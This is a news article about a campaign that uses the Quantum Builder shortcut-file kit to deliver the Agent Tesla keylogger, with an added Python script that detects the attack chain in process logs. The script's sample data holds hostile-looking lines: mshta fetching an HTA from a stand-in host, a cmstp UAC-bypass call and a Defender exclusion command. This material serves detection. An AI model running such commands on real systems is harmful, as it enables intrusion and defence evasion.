A new malware campaign uses the recently discovered Quantum Builder and sophisticated tactics to deliver a malicious payload.


A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cyber security vendor Zscaler.

Quantum Builder, also known as Quantum LNK Builder, is used to create malicious shortcut files. It has been linked to Lazarus — an APT (advanced persistent threat) actor linked to North Korea — due to shared tactics, techniques and procedures (TTPs) and source code overlap. “But we cannot confidently attribute this campaign to any specific threat actor,” Zscaler noted in a blog post.

Agent Tesla was first detected in 2014. In the current campaign, Quantum Builder is being used to generate malicious .lnk, .hta, and PowerShell payloads, which then deliver Agent Tesla to the targeted machines, according to Zscaler.

“This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past,” Zscaler noted.

Quantum Builder used in a string of new malware attacks

Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. “This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organisations,” Zscaler noted.

The payloads generated by the builder employ sophisticated techniques such as a User Account Control (UAC) bypass using the Microsoft Connection Manager Profile Installer (CMSTP) binary to execute the final payload with administrative privileges, and to add Windows Defender exclusions.

The new malware campaign has also been seen utilising a multi-staged infection chain integrating various attack vectors, Zscaler said. It executes PowerShell scripts in-memory to evade detection and is also seen executing decoys to distract victims after devices have been infected.

New attacks start with spear phishing email

The attack chain starts with a spear-phishing mail that contains a GZIP attachment. The GZIP includes a shortcut that is designed to execute PowerShell code responsible for launching a remote HTML application using the mshta.exe binary.

The phishing email looks like it is from a Chinese supplier of lump and rock sugar—it has a subject line stating “New Order Confirmation – Guangdong Nanz Technology co. ltd.”—and has a malicious .lnk file with a PDF icon.

Once the shortcut masquerading as a PDF is opened, the HTA file decrypts a PowerShell loader script, which in turn decrypts and loads another PowerShell script after performing AES (Advanced Encryption Standard) decryption and GZIP decompression.

The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server and then executes it with administrative privileges by performing a User Account Control (UAC) bypass using CMSTP. Agent Tesla therefore runs on the target machine with administrative privileges.
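The chain described above (shortcut → PowerShell → mshta.exe → PowerShell → cmstp.exe) and the Windows Defender exclusions mentioned earlier are both visible in process-creation telemetry, so a defender can look for them without any knowledge of the encrypted payloads. The following detection logic is an added example, not code from Zscaler or from the article: it walks constructed process-creation events shaped like Sysmon Event ID 1 records (process id, parent id, image path, command line) and flags mshta.exe or cmstp.exe started anywhere beneath powershell.exe, as well as PowerShell command lines that call `Add-MpPreference` with an exclusion parameter. All pids, paths and command lines are constructed sample data; the `.inf` argument to cmstp.exe is a placeholder that the article itself does not describe.

```python
# Added example (not Zscaler's or the article's code): detection logic for the
# process chain the article describes. It inspects constructed process-creation
# events shaped like Sysmon Event ID 1 (pid, parent pid, image, command line)
# and flags (1) mshta.exe or cmstp.exe started anywhere beneath powershell.exe
# and (2) PowerShell command lines that add Windows Defender exclusions.
# All pids, paths and command lines below are constructed sample data.

from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Living-off-the-land binaries in the chain: mshta.exe launches the remote HTA,
# cmstp.exe is abused for the UAC bypass.
LOLBINS = {"mshta.exe", "cmstp.exe"}
POWERSHELL = "powershell.exe"


def basename(image: str) -> str:
    """Lower-cased file name of an image path (backslash or slash separated)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image basenames from process `pid` up to the root of its parent chain.

    Assumes pids are unique within the event window; real logs must also key on
    creation time or a process GUID because Windows reuses pids.
    """
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def find_alerts(events):
    """Return (pid, reason) tuples for events matching either detection rule."""
    alerts = []
    for e in events:
        name = basename(e.image)
        chain = ancestry(events, e.pid)
        # Rule 1: a LOLBin with PowerShell anywhere among its ancestors.
        if name in LOLBINS and POWERSHELL in chain[1:]:
            alerts.append((e.pid, f"{name} under PowerShell: {' <- '.join(chain)}"))
        # Rule 2: PowerShell adding a Defender exclusion (Add-MpPreference -Exclusion*).
        low = e.cmdline.lower()
        if name == POWERSHELL and "add-mppreference" in low and "-exclusion" in low:
            alerts.append((e.pid, "Defender exclusion added via PowerShell"))
    return alerts


def alert_pids(events):
    """Sorted, de-duplicated pids of all alerting events."""
    return sorted({pid for pid, _ in find_alerts(events)})


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events mirroring the article's chain, plus one benign PowerShell use.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # double-clicked .lnk: Explorer starts PowerShell, which runs mshta
    ProcEvent(200, 100, PS, "powershell.exe -c <launch remote HTA>"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://stage.example.invalid/page.hta"),
    # the HTA runs the in-memory PowerShell loader / downloader
    ProcEvent(400, 300, PS, "powershell.exe -c <decrypt and run downloader>"),
    ProcEvent(500, 400, r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe C:\Users\victim\AppData\Local\Temp\profile.inf"),
    ProcEvent(600, 400, PS,
              r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\victim\AppData"),
    # benign: an administrator opens Notepad from an interactive PowerShell
    ProcEvent(700, 100, PS, "powershell.exe"),
    ProcEvent(800, 700, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]


if __name__ == "__main__":
    for pid, reason in find_alerts(SAMPLE_EVENTS):
        print(pid, reason)
```

Run as-is, the script reports pids 300 (mshta under PowerShell), 500 (cmstp under PowerShell, with the full ancestry) and 600 (Defender exclusion), and stays silent on the benign PowerShell-to-Notepad pair. Walking the whole ancestry rather than only the immediate parent is what catches cmstp.exe here, since its direct parent is the second PowerShell instance, not the one started from the shortcut.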

A second variant of Agent Tesla was also observed, in which the threat actors used a ZIP file and other sophisticated methods to hide their activities. Agent Tesla has been active since 2014; in 2018 it had more than 6,300 customers paying subscription fees to license the software. Currently, Agent Tesla is being sold for $182 a month on the dark web, according to Hacker News.

Quantum Builder was first discovered by Cyble Research Labs in June this year on a cybercrime forum. The threat actor claimed in the post that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. A video was also posted demonstrating how to build .lnk, .hta, and .iso files using the malware builder.

The .hta payload can be created using Quantum Builder by customising options such as the payload URL, DLL (dynamic link library), UAC bypass, and execution path details, as well as a time delay before the payload executes.
